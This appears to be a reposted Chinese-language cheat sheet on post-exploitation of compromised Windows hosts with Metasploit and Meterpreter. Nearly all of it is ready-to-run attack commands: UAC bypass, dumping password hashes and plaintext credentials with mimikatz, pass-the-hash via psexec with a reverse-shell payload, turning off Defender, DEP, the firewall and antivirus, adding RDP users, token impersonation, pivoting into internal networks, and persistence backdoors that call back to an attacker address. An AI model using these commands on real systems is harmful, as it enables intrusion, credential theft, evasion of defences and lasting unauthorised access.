后渗透流程
权限提升
绕过UAC
msf模块
Exploit/windows/local/bypassuac
Exploit/windows/local/bypassuac_injection
Exploit/windows/local/bypassuac_vbs
系统提权
提高程序运行级别
msf模块(Exploit/windows/local/ask)
缺点:需要uac交互
后渗透信息收集
msf模块(post)
获取目标主机的分区情况:
post/windows/gather/forensics/enum_drives判断是否为虚拟机:
post/windows/gather/checkvm开启了哪些服务:
post/windows/gather/enum_applications查看共享:
post/windows/gather/enum_shares获取主机最近的系统操作:
post/windows/gather/dumplinks查看补丁:
post/windows/gather/enum_applicationsenum_patchesscraper脚本
路径:/usr/share/metasploit-framework/scripts/meterpreter
(
meterpreter下run scraper)
保存信息的目录:/root/.msf4/logs/scripts/scraper/192.xxx.xx.xx.xx
winenum脚本(meterpreter下run winenum)
数据包抓获
目的:抓获与外围的交互
使用地点:找不到进入内网的方法(主机在防火墙,开放端口少,是服务器的子网)
抓包
sniffer会过滤掉自身merterpreter产生的流量,直接去抓取和主机相关的数据包信息
加载sniffer:
load sniffer查看网卡信息;
sniffer_interfaces开启监听:
sniffer_start 1导出数据包:
sniffer_dump 1 1.cap
解包
auxiliary/sniffer/psnuffle
meterpreter模块
run packetrecorder
run post/windows/manage/rpcapd_start
抓hash
基础:密码格式:
用户名称:RID:LM-HASH值:NT-HASH值
hashdumprun post/windows/gather/smart_hashdump检查权限和系统类型
检查是否是域控制服务器
从注册表读取hash,注入lsass进程
如果是08server并且具有管理员权限,直接getsystem尝试提权
如果是win7且UAC关闭并具有管理员权限,从注册表读取
03/XP直接getsystem,从注册表读取hash
需要administrator及以上权限,需要免杀
privilege::debug#查看权限sekurlsa::logonpasswords#获取hash和明文密码(如果可以的话)sekurlsa::ekeys#获取kerberos加密凭证
mimikatz(已集合到mimikatz)
Hashcat
hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —forceMSF
exploit/windows/smb/psexec
mimikkatz
sekurlsa::pth /user:Administrator /domain:WIN-RRI9T9SN85D /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0关闭Denfender(shell)
Net stop windefend
关闭DEP(shell)
Bcdedit.exe /set {current} nx AlwaysOff
关闭杀毒软件(meterpreter)
Run killav
Run post/windows/manage/killava
开启远程桌面
run post/windows/manage/enable_rdp(方式一)run getgui -e(方式二)开启远程桌面并添加新用户
run getgui -u root -p pass
hash破解
文章:
(https://www.anquanke.com/post/id/177123)
hash传递攻击
UAC注册表:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System
进shell,中文乱码,输入chcp 65001
shell改注册表uac为0reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp set LHOST 192.168.206.128
set RHOST 192.168.206.101
set SMBUser administrator
set SMBPass AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C0 89C0
exploit
关闭防火墙及杀毒软件
-关闭防火墙(shell)
- Netsh advfirewall set allprofiles state off(管理员及以上权限)
远程桌面
run multi_console__command -r /root/.msf4/loot/20191206223922_default_192.168.85.157_host.windows.cle_974816.txt(关闭远程桌面)
开启远程桌面并绑定在8888端口
- `run getgui -e -f 8888`截图
load espiascreengrab远程桌面连接
kali下:rdesktop -u root -p 123 192.168.85.157
令牌假冒
windows安全相关概念
session
Windows Station
Desktop
Login Session:不同账号登陆产生不同的登陆Session,代表不同的账号权限
incognito
load incognito
list_tokens -u
(非交互的token多出来一条EA\Administrator)impersonate_token EA\Administrator
成功登陆
跳板攻击
pivoting
利用已经被入侵的主机作为跳板来攻击网络中其他系统
访问由于路由问题而不能直接访问的内网系统
添加路由
方式一:run autoroute -s 192.168.102.0/24
方式二:run post/multi/manage/autoroute(更新)
利用win7攻击内网服务器
扫描内网网络
run post/windows/gather/arp_scanner rhosts=192.168.102.0/24
use auxiliary/scanner/portscan/tcp
ProxyChains代理设置
配置:vim /etc/proxychain.conf(加上ip)
Socket代理
auxiliary/server/socks4a
ProxyChains
ProxyChains是为GUN\Linux操作系统而开发的工具,任何TCP连接都可以通过TOP或者SCOKS4,SCOKS5,HTTP/HTTPS路由到目的地。在这个通道技术中可以使用多个代理服务器。除此之外提供匿名方式,诸如用于中转跳板的应用程序也可以用于中转跳板的应用程序也可以用于对发现的新网络进行直接通信。
proxychains nmap -sT -sV -Pn -n -p 22,80,135,139,445 --script=smb-vuln-ms08-067.nse 192.168.xx.xxx
后门植入
meterpreter后门:Metsvc
通过服务启动
run metsvc -A #设定端口,上传后门文件
meterpreter后门:persistence
通过启动型启动
特性:定期会连,系统启动时回连,自动运行
run persistence -A -S -U -i 60 -p 4321 -r 192.168.101.111
原文:https://blog.csdn.net/weixin_44255856/article/details/1侵权请私聊公众号删文
推荐阅读
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看”
如有侵权请联系:admin#unsafe.sh